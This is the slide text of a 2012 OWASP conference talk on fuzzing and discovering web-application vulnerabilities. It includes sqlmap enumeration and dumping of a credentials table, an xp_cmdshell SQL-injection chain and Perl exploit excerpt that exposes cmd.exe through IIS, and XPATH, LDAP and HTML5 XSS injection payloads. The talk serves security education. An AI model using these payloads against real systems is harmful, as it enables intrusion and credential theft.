1. FIND ME IF YOU CAN – SMART FUZZING AND
DISCOVERY
SHREERAJ SHAH
OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon
2. Who Are We? http://shreeraj.blogspot.com
http://shreeraj.blogspot.com
shreeraj@blueinfy.com
shreeraj@blueinfy.com
http://www.blueinfy.com
http://www.blueinfy.com
• Founder & Director
– Blueinfy Solutions Pvt. Ltd. (Brief)
– SecurityExposure.com
• Past experience
– Net Square, Chase, IBM & Foundstone
• Interest
– Web security research
• Published research
– Articles / Papers – Securityfocus, O’erilly, DevX, InformIT etc.
– Tools – wsScanner, scanweb2.0, AppMap, AppCodeScan, AppPrint etc.
– Advisories - .Net, Java servers etc.
• Books (Author)
– Web 2.0 Security – Defending Ajax, RIA and SOA
– Hacking Web Services
– Web Hacking
OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon
3. Well Known Fact!
• 90% of sites are vulnerable to one or more
vulnerabilities.
• Exploitable ? – YES!
• Most popular ones are – SQLi & XSS
• SQLi – complete compromise of the
application …
• XSS – Control over browser and exploitation
OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon
4. Traditional Fuzzing – Not working
• Enterprise running on 2.0 wave - Portal
• Technologies & Components – Dojo, Ajax, XML
Services, Blog, Widgets
• Scan with tools/products failed
• Security issues and hacks
– SQL injection over XML
– Ajax driven XSS
– Several XSS with Blog component
– Several information leaks through JSON fuzzing
– CSRF on both XML and JS-Array
» HACKED
» DEFENSE
OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon
5. AppSec – Past, Present …
Source - OWASP
OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon
5
6. Enterprise Technology Trend
• 2007. Web services would rocket from $1.6
billion in 2004 to $34 billion. [IDC]
• 2008. Web Services or Service-Oriented
Architecture (SOA) would surge ahead.
• 2009. Enterprise 2.0 in action and penetrating
deeper into the corporate environment
• 2010. Flex/Cloud/API era.
• 2012. Mobile/HTML5 era.
OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon
7. Architecture
Documents
News Weather
Mails Bank/Trade
Browser Internet
RSS feeds
Ajax
RIA (Flash) Internet Web 2.0 Start
HTML / JS / DOM
Blog Database Authentication
Application
Infrastructure
Web Services
End point
OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon
8. Environment
Internet DMZ Trusted
SOAP/JSON etc.
Mobile
Web 2.0 W
Services E
Scripted Application B
Web Web Servers S
Server Engine And E
Web Static pages only Dynamic pages
(HTML,HTM, etc.) (ASP,DHTML, PHP, Integrated R
Client CGI, etc.) Framework V
X
I
ASP.NET on C
.Net Framework, E
J2EE App Server, S
Web Services,
DB etc.
Internal/Corporate
OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon
9. Stack/Logic - Layers • Android
• iPhone/Pad
• HTML • Other
5
• Storage • Flash
Mobile • AMF
• WebSocket
• DOM
• WebSQL •
• JS • Storage Flex
• XHR • XAML
Server side
Components • Silverlight • WCF
Presentation Layer • NET
Business Layer
Client side
Data Access Layer Components
Authentication (Browser)
Communication etc.
Runtime, Platform, Operating System Components
OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon
10. Browser & Mobile – Arch.
Mobile
HTML5 + CSS Silverlight Flash
API (Media, Geo etc.) & Messaging Plug-In
Presentation
JavaScript DOM/Events Parser/Threads
Process & Logic
WebSQL Cache Storage
XHR 1 & 2 WebSocket Plug-in Sockets
Browser Native Network Services Network
& Access
SOP/CORS Sandbox Core
Policies
OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon
11. Case study - Pageflakes
OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon
12. Case study - Pageflakes
Widgets
Web Services
OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon
22. JSON
message = {
from : "john@example.com",
to : "jerry@example.com",
subject : "I am fine",
body : "Long message here",
showsubject : function(){document.write(this.subject)}
};
OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon
26. Attacker’s approach
• Fuzzing over HTTP
• Injecting faults with various set of payload
• Try to raise the exception
• Exception throw message back as part of HTTP
response
• Scanning response for signatures
• If signature found, it becomes interesting
entry for exploitation
OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon
27. Challenges
• Technology fingerprinting
• Hidden calls
• Framework integration
• Entry points are multiple
• Traditional fuzzing will not work
• Auto assessment can be challenge
• Behavioral assessment with Artificial
intelligence
OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon
28. Old Approach
• Forcing SQL errors.
• Ideal for identifying database interfaces!
http://192.168.7.120/details.asp?id= ‘3
select * from items where product_id = ‘3
DB
OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon
29. Error – Now? – forget it
• Premature SQL query termination
We now have an
SQL injection point.
OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon
30. Blind SQL Injection
• We have SQL injection point but it is not throwing any error message out
as part of its response. Application is sending customized error page
which is not revealing any signature by which we can deduce potential
SQL flaw.
• Knowing SQL injection point or loophole in web application, xp_cmdshell
seems to be working. But we can’t say is it working or not since it doesn’t
return any meaningful signature. This is “blind xp_cmdshell”.
• Firewall don’t allow outbound traffic so can’t do ftp, tftp, ping etc from
the box to the Internet by which you can confirm execution of the
command on the target system.
• We don’t know the actual path to webroot so can’t copy file to location
which can be accessed over HTTP or HTTPS later to confirm the execution
of the command.
• If we know path to webroot and directory structure but can’t find execute
permission on it so can’t copy cmd.exe or any other binary and execute
over HTTP/HTTPS.
OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon
32. Running tools
• SQL Map or Absinthe
D:toolssqlmap>sqlmap.py -b -u http://192.168.50.50/details.aspx?id=1
sqlmap/0.4 coded by inquis <bernardo.damele@gmail.com>
and belch <daniele.bellucci@gmail.com>
[*] starting at: 18:47:58
[18:48:00] [WARNING] the remote DMBS is not MySQL
[18:48:00] [WARNING] the remote DMBS is not PostgreSQL
remote DBMS: Microsoft SQL Server
banner:
---
Microsoft SQL Server 2005 - 9.00.1399.06 (Intel X86)
Oct 14 2005 00:33:37
Copyright (c) 1988-2005 Microsoft Corporation
Express Edition on Windows NT 5.2 (Build 3790: Service Pack 2)
---
[*] shutting down at: 18:48:14
OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon
33. Enumeration…
D:toolssqlmap>sqlmap.py -b -u http://192.168.50.50/details.aspx?id=1 --dbs
sqlmap/0.4 coded by inquis <bernardo.damele@gmail.com>
and belch <daniele.bellucci@gmail.com>
[*] starting at: 18:53:10
[18:53:12] [WARNING] the remote DMBS is not MySQL
[18:53:12] [WARNING] the remote DMBS is not PostgreSQL
remote DBMS: Microsoft SQL Server
banner:
---
Microsoft SQL Server 2005 - 9.00.1399.06 (Intel X86)
Oct 14 2005 00:33:37
Copyright (c) 1988-2005 Microsoft Corporation
Express Edition on Windows NT 5.2 (Build 3790: Service Pack 2)
---
available databases [9]:
[*] CmdExec_example
[*] Dashboard
[*] catalog
[*] demotrading
[*] master
[*] model
[*] msdb
[*] order
[*] tempdb
[*] shutting down at: 18:55:07
OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon
34. Enumeration…
D:toolssqlmap>sqlmap.py -u http://192.168.50.50/details.aspx?id=1 --tables -D
catalog
sqlmap/0.4 coded by inquis <bernardo.damele@gmail.com>
and belch <daniele.bellucci@gmail.com>
[*] starting at: 18:59:21
[18:59:22] [WARNING] the remote DMBS is not MySQL
[18:59:22] [WARNING] the remote DMBS is not PostgreSQL
remote DBMS: Microsoft SQL Server
Database: catalog
[3 tables]
+--------------+
| auth |
| dtproperties |
| items |
+--------------+
OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon
35. Enumeration…
D:toolssqlmap>sqlmap.py -u http://192.168.50.50/details.aspx?id=1 --dump -D ca
talog -T auth
sqlmap/0.4 coded by inquis <bernardo.damele@gmail.com>
and belch <daniele.bellucci@gmail.com>
[*] starting at: 19:01:27
[19:01:28] [WARNING] the remote DMBS is not MySQL
[19:01:28] [WARNING] the remote DMBS is not PostgreSQL
remote DBMS: Microsoft SQL Server
Database: catalog
Table: auth
[3 entries]
+--------+------+---------+
| access | user | pass |
+--------+------+---------+
| 101010 | dbo | john123 |
| 110011 | | great |
| 001011 | | loveit |
+--------+------+---------+
OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon
36. Blind Exploiting
Set WshShell = WScript.CreateObject("WScript.Shell")
Set ObjExec = WshShell.Exec("cmd.exe /c echo %windir%")
windir = ObjExec.StdOut.ReadLine()
Set Root = GetObject("IIS://LocalHost/W3SVC/1/ROOT")
Set Dir = Root.Create("IIsWebVirtualDir", "secret")
Dir.Path = windir
Dir.AccessExecute = True
Dir.SetInfo
http://target/details.asp?id=1;exec+master..xp_cmdshell+’echo ' Set WshShell =
WScript.CreateObject("WScript.Shell") > c:secret.vbs’
…..
…..
…..
http://target/details.asp?id=1;exec+master..xp_cmdshell+’echo ' Dir.SetInfo
>> c:secret.vbs’
http://target/details.asp?id=1;exec+master..xp_cmdshell+'cscript+c:secret.vbs’
OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon
37. Get the cmd.exe
• Run command over HTTP/HTTPS
• http://target/secret/system32/cmd.exe?+/c+set
OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon
38. Running…
sub Exploit {
my $self = shift;
my $target_host = $self->GetVar('RHOST');
my $target_port = $self->GetVar('RPORT');
my $path = $self->GetVar('RPATH');
my $vhost = $self->GetVar('VHOST');
my @url = split(/#/, $path);
my @payload =
("EXEC+master..xp_cmdshell+'echo+Set+WshShell+=+WScript.CreateObject("WScript.Shell")>c:secret.vbs'",
"EXEC+master..xp_cmdshell+'echo+Set+Root+=+GetObject("IIS://LocalHost/W3SVC/1/ROOT")>>c:secret.vbs'",
"EXEC+master..xp_cmdshell+'echo+Set+Dir+=+Root.Create("IIsWebVirtualDir","secret")>>c:secret.vb s'",
"EXEC+master..xp_cmdshell+'echo+Dir.Path+=+"c:winntsystem32">>c:secret.vbs'",
"EXEC+master..xp_cmdshell+'echo+Dir.AccessExecute+=+True>>c:secret.vbs'",
"EXEC+master..xp_cmdshell+'echo+Dir.SetInfo>>c:secret.vbs'",
"EXEC+master..xp_cmdshell+'cscript+c:secret.vbs'"
);
$self->PrintLine("[+] Sending SQL injection payload...");
for(my $count=0;$count<=6;$count++)
..
OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon
39. XPATH injection
• XPATH parsing standard error
• XPATH is method available for XML parsing
• MS SQL server provides interface and one can
get table content in XML format.
• Once this is fetched one can run XPATH
queries and obtain results.
• What if username/password parsing done on
using XPATH – XPATH injection
OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon
40. XPATH injection
string fulltext = "";
string coString =
"Provider=SQLOLEDB;Server=(local);database=order;User
ID=sa;Password=mypass";
SqlXmlCommand co = new SqlXmlCommand(coString);
co.RootTag="Credential";
co.CommandType = SqlXmlCommandType.Sql;
co.CommandText = "SELECT * FROM users for xml Auto";
XmlReader xr = co.ExecuteXmlReader();
xr.MoveToContent();
fulltext = xr.ReadOuterXml();
XmlDocument doc = new XmlDocument();
doc.LoadXml(fulltext);
string credential = "//users[@username='"+user+"' and
@password='"+pass+"']";
XmlNodeList xmln = doc.SelectNodes(credential);
string temp;
if(xmln.Count > 0)
{
//True
}
else //false
OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon
41. XPATH injection
string credential =
"//users[@username='"+user+"' and
@password='"+pass+"']";
• XPATH parsing can be leveraged by
passing following string ' or 1=1 or ''=‘
• This will always true on the first node and
user can get access as who ever is first
user.
Bingo!
OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon
42. LDAP Injection
Resource viewer :
http://www.something.com/res.cgi?type=1)(uid=*))
•Notice the injection
•Attacker bypasses the user id check
•(S)he can view all machines now
OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon
43. SOAP – INJECTIONS & FUZZING
OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon
44. Fetching Calls
• Identifying services layer calls
OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon
45. Technology Identification
• Location can be obtained from UDDI
as well, if already published.
• WSDL location [ Access Point ]
http://192.168.11.2/ws/dvds4less.asmx?wsdl
.asmx – indicates
.Net server from MS
OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon
46. SOAP request SOAP
Envelope
<?xml version="1.0" encoding="utf-16"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema">
<soap:Body>
<getProductInfo xmlns="http://tempuri.org/">
<id>1</id>
</getProductInfo>
</soap:Body>
</soap:Envelope>
Input to the
method
Method
Call
OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon
47. SOAP response SOAP
Envelope
<?xml version="1.0" encoding="utf-16"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema">
<soap:Body>
<getProductInfoResponse xmlns="http://tempuri.org/">
<getProductInfoResult>/(1)Finding Nemo($14.99)/</getProductInfoResult>
</getProductInfoResponse>
</soap:Body>
</soap:Envelope>
Output to the
method Method
response
OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon
48. HTML5 & CLIENT SIDE FUZZING
OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon
49. HTML5 – Tags/Attributes/Events
• Tags – media (audio/video), canvas
(getImageData), menu, embed,
buttons/commands, Form control (keys)
• Attributes – form, submit, autofocus, sandbox,
manifest, rel etc.
• Events/Objects – Navigation (_self), Editable
content, Drag-Drop APIs, pushState (History)
etc.
49
OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon
50. HTML5 – XSS
• Blacklist and filter will get bypassed
• Lot of new signatures and possible ways to
execute scripts
• XSS can be injected from tags and events
• New attributes are available for XSS payload
50
OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon
51. XSS variants
• Media tags
• Examples
– <video><source onerror="javascript:alert(1)“>
– <video onerror="javascript:alert(1)"><source>
51
OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon
57. DOM based XSS - Messaging
• It is a sleeping giant in the Ajax applications
coupled with Web Messaging
• Root cause
– DOM is already loaded
– Application is single page and DOM remains same
– New information coming needs to be injected in using
various DOM calls like eval()
– Information is coming from untrusted sources
– JSONP usage
– Web Workers and callbacks
OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon
58. AJAX with HTML5 – DOM
• Ajax function would be making a back-end call
• Back-end would be returning JSON stream or
any other and get injected in DOM
• In some libraries their content type would
allow them to get loaded in browser directly
• In that case bypassing DOM processing…
OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon
59. APIs …
• HTML5 few other APIs are interesting from
security standpoint
– File APIs – allows local file access and can mixed
with ClickJacking and other attacks to gain client
files.
– Drag-Drop APIs – exploiting self XSS and few other
tricks, hijacking cookies …
– Lot more to explore and defend…
OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon